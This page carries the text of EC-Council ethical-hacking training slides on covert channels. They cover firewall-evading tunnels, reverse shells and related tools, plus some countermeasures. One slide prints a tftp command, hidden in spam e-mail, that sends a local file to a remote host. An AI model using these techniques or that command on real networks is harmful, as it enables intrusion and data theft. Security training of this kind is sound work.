Click here to load reader
Upload
humosapiens
View
205
Download
37
Tags:
Embed Size (px)
Citation preview
Ethical HackingVersion 5
Module 24
Covert Hacking
EC-Council
Insider Attacks
� Insider attacks are attacks initiated from inside-out
� Inside-Out attacks try to initiate network connections from the trusted (corporate) to the untrusted (Internet) network
� These techniques are used to evade firewall filters
OutsiderInsider
EC-Council
What is Covert Channel?
�A Covert channel is a mechanism for sending and receiving information data between machines without alerting any firewalls and IDS’s on the network
�The technique derives its stealthy nature by virtue of the fact that it sends traffic through ports that most firewalls will permit through
xx xxNetwork Firewall Internet
Attacker
EC-Council
Security Breach
� A covert channel has a security breach because it involves a trusted insider who is sending information to an unauthorized outsider in a covert fashion.
� For example, an employee wants to let an outsider know if his company won a big contract
� The two could come up with a scheme to communicate this information secretly
EC-Council
Why Do You Want to Use Covert Channel?
� Transfer a file from a Victim machine to a hacker machine
� Transfer a file from hacker machine to victim machine
� Launch applications at victim machine
� Interactive remote control access from hacker machine to victim machine
� Bypass any corporate filtered firewall rules
� Bypass corporate proxy server content filters
EC-Council
Motivation of a Firewall Bypass?
• Surfing to filtered websites (e.g. www.certifiedhacker.com)
• Listening Internet radio
• Chatting to Internet friends
• Administration of home webservers via SSH
• Uploading and downloading of special files (EXE, ZIP) which are filtered by the corporate content filter policy
• Using peer-to-peer techniques
� Who wants to bypass the firewall policy?
• Advanced users from the internal network
• Disgruntled employees
• Hackers
EC-Council
Covert Channels Scope
EC-Council
Covert Channel: Attack Techniques
1. Implementing hacker-code within the optional fields of an internet-allowed protocol
• DNS tunnel, ICMP tunnel
2. Tunneling hacker-payload within the request and response of an internet allowed protocol
• HTTP tunnel, E-Mail tunnel
3. Running other protocols on the desired ports than normally assigned
• For example running IRC on port 80 (http)
4. Misusing internet-allowed protocols
• Proxy connect method
EC-Council
Simple Covert Attacks
� Simple covert attacks use direct channels to communicate to the Internet
� Direct Channels• ACK tunnel
• TCP tunnel (pop, telnet, ssh)
• UDP tunnel (syslog, snmp)
• ICMP tunnel
• IPSEC, PPTP
EC-Council
Simple Covert Attacks
xx xx xx xx
Network Firewall InternetCorporateAttacker
EC-Council
Advanced Covert Attacks
� Advanced covert attacks use proxified channels to communicate on the Internet
� Proxified Channels
• Socks SSL tunnel
• HTTP/S tunnel (payload of http = tunnel)
• HTTP/S proxy CONNECT method tunnel
• DNS tunnel
• FTP tunnel
• Mail tunnel
EC-Council
Advanced Covert Attacks
xx xx xx xx
Network DMZ Proxy InternetCorporateAttacker
LAN Proxy
EC-Council
Standard Direct Connection
Victim ServerAttacker
EC-Council
Reverse Shell (Reverse Telnet)
Victim ServerAttacker
EC-Council
Direct Attack Example
xx
xxxx xx
xxxx
xx
xxxx xx
xx
xx
Buffer Overflow is an example of direct attack
Web Server Request
Passed by the Firewall
Reverse Shell is Established
Hacker controlled hostInternalNetwork
EC-Council
In-Direct Attack Example
xxxx
xx
xxxx xx
xx
xx
Port Blocked byFirewall
INSIDERRemote Control Indirect Attack
Web Server Request
BLOCKED by the Firewall
Reverse Shell is Established
Hacker controlled hostInternalNetwork
EC-Council
Reverse Connecting Agents
� Reverse connecting agents can be installed by:• E-Mail (Attachments, HTML social engineering)
• Downloaded from the Web
• CD-ROM Autostart program
• ZIP drives
• USB-Stick
• IPOD Drives
EC-Council
Covert Channel Attack Tools
� Netcat
� DNS tunnel
� SSH reverse tunnel
� HTTP/S tunnel
� HTTPS proxy CONNECT method tunnel
� ICMP tunnel
EC-Council
Netcat
� Netcat is the most popular tool for reverse shell exploits
� Widely used as payload in buffer overflows
EC-Council
DNS Tunneling
� The data is tunneled through DNS traffic
� How it works: The client does DNS lookups for a host in the delegated domain. Ifthe server wants to connect it responds with a 'key' IP address. The client then starts a shell in a pipe and feeds the output of the shell (in the form of DNS queries) to the server.
xxxx
xxxx xx xx
xx
xx xx
xxxx
xx
EC-Council
Covert Channel Using DNS Tunneling
Client ServerPoll
Poll
Poll
Commands
Execute
Commands
Commands
1. POLL2. GET FILE TO
CLIENT3. PUT FILE TO
SERVER4. EXECUTE
@CLIENT5. EXIT CLIENT
EC-Council
DNS Tunnel Client
� The DNS Tunnel Client is a tool that uses DNS queries to build up a tunnel to the DNS Tunnel Server which is located on the Internet
� When the tunnel is established successfully you have the capability to remote control your computer over the web site of the DNS Tunnel Server
EC-Council
DNS Tunneling Countermeasures
� Separate internal from external DNS
� Apply Firewall rule: Allow DNS from internal http proxy servers only
� Apply Firewall rule: Deny all other DNS packets
EC-Council
Covert Channel Using SSH
�Assuming SSH is allowed by the Firewall, establish a SSH connection from inside-out
�Use this connection to gain access to the internal systems
xx xxxx
xxxx xx
xx
xx
EC-Council
Covert Channel using SSH (Advanced)
�Use SSL if proxy server is used internally and content filtering is enabled
xx xxxx
xxxx xx
xx
xx xxxx
xx
EC-Council
HTTP/S Tunneling Attack
� Establish inside-out connection using http POST request (port 80 is usually allowed)
xx xxxx
xxxx xx xx
Web Server
Corporate LAN InternetHTTP/S Proxy
Content FilteringEnabled
1. Data is sent using http + applets
2. SSH is established from the web server to hacker machine
Victim
xxxx
xx HTTP ProxyHttp, https, ftp
xx
EC-Council
Covert Channel Hacking Tool: Active Port Forwarder
� Active port forwarder is a software tool for secure port forwarding.It uses SSL to increase security of communication between a server and a client
� This tool can be used to bypass firewalls
EC-Council
Covert Channel Hacking Tool: CCTT
� CCTT (Covert Channel Tunneling Tool) enables the creation of communication channels through NACS to create data streams which can :
• Establish an external server shell from within the internal network
• Establish a shell from a box located within the internal network to an external server
• Establish a TCP/UDP/HTTP CONNECT | POST channel allowing TCP data streams (ssh, smtp, pop, etc...) between an external server and a box from within the internal network
EC-Council
Covert Channel Hacking Tool: Firepass
� Firepass - is a tunneling tool, allowing to bypass firewall restrictions and encapsulate data flows inside legal ones to use HTTP POST requests
� TCP or UDP based protocols may be tunneled with Firepass
EC-Council
Covert Channel Hacking Tool: MsnShell
� MsnShell is a covert channel tunneling tool that allows you to remotely control a Linuxcomputer protected by a firewall
� MsnShell encapsulates shell commands and responses within the MSN protocol
• Establish a shell from a box located within the internal network to an external server
• Encapsulate shell commands and responses within the MSN protocol (SHELL over MSN)
• Supports HTTP proxy (SHELL over MSN over HTTP)
EC-Council
Covert Channel Hacking Tool: Web Shell
� "Web Shell" is a remote UNIX/WIN shell, that tunnels packets viaHTTP/HTTPS
� The client component provides shell-like prompt, encapsulating user commands into HTTP POST requests and sending them to the server part script on the target web server directly or via HTTP proxy server
� The server part extracts and executes commands from HTTP post requests and returns STDOUT and STDERR output as HTTP response messages
• SSL support
• Command line history support
• File upload/download
EC-Council
Covert Channel Hacking Tool: NCovert
� Ncovert is an open-sourced program designed to function as a TCP covert channel
� It is a file transfer system that uses the TCP protocol to covertly move data from one system to another
� NCovert uses spoofing techniques to hide the source of communications and the data that travels over the network
� The technique essentially creates a covert channel for communications by hiding four characters of data in the header's initial sequence number (ISN) field
EC-Council
Ncovert - How it works
� Sender sends SYN packet with data in ISN to public server, forges source IP as receiver's IP
� Public server receives SYN, sends SYN/ACK to receiver's machine
� Receiver's machine sniffs the packet and extracts the data, the OS sends a RST to public server
� This process is repeated until all data is sent
EC-Council
Ncovert2 - How it works - Part 1
1. Sender and receiver agree on shared secret, turned into SHA-1
2. Sender generates random session key and creates IPID and source port from SHA-1 and session key
3. Sender XORs file size and session key to create ISN
4. The first packet is sent to port 80 with session key in IPID andsource port file size in ISN
5. Receiver sniffs for packet for destination address with destination port 80
6. Receiver extracts session key from IPID and source port using SHA-1 hash
7. Receiver extracts file size from ISN using session key
8. Sender and receiver generate session hash from session key and SHA-1 password hash for creating predictable source ports
EC-Council
Ncovert2 - How it works - Part 2
9. Sender XORs data with previous ISN and session hash to create new ISN, creates a packet with a random IP ID, the “predictable” sourceport, and new ISN, and sends the packet
10. Sender also sends decoy packets as well11. Destination ports on legit and decoy packets randomly use 1-65535,
repeating as needed12. Receiver sniffs packets, ignores packets without “predictable”
destination ports, uses previous ISN and session hash to extract data13. Packets sent until all data is transmitted14. Source address is only required on the first packet, so source
addresses can be changed to something “random”, including decoy packets
15. Transmission should look like a TCP ping to port 80 followed by afull port scan, with random source addresses
EC-Council
Covert Channel Hacking via Spam E-mail Messages
� Covert channel communication via spam messages is difficult to detect because of the means of delivery
� By using keyword or phrase- based communication with the back door system, the email appears to be ordinary spam
� This text can be varied by attacker specification
� This makes detection via standard intrusion detection methods virtually impossible
� The client and server component can exchange information by simply sending spam e-mail messages
EC-Council
Covert Channel Hacking via Spam E-mail Messages
� Hiddenembeddedcommand inside the spam e-mail:
� tftp –I 10.0.0.6c:\conf\abc.dat send.dat
EC-Council
Hydan
� Hydan steganographically conceals a message into an application without altering the file size
� It exploits redundancy in the i386 instruction set by defining sets of functionally equivalent instructions It then encodes information in machine code by using the appropriate instructions from each set
� This tool can be used for covert communication
� http://crazyboy.com/hydan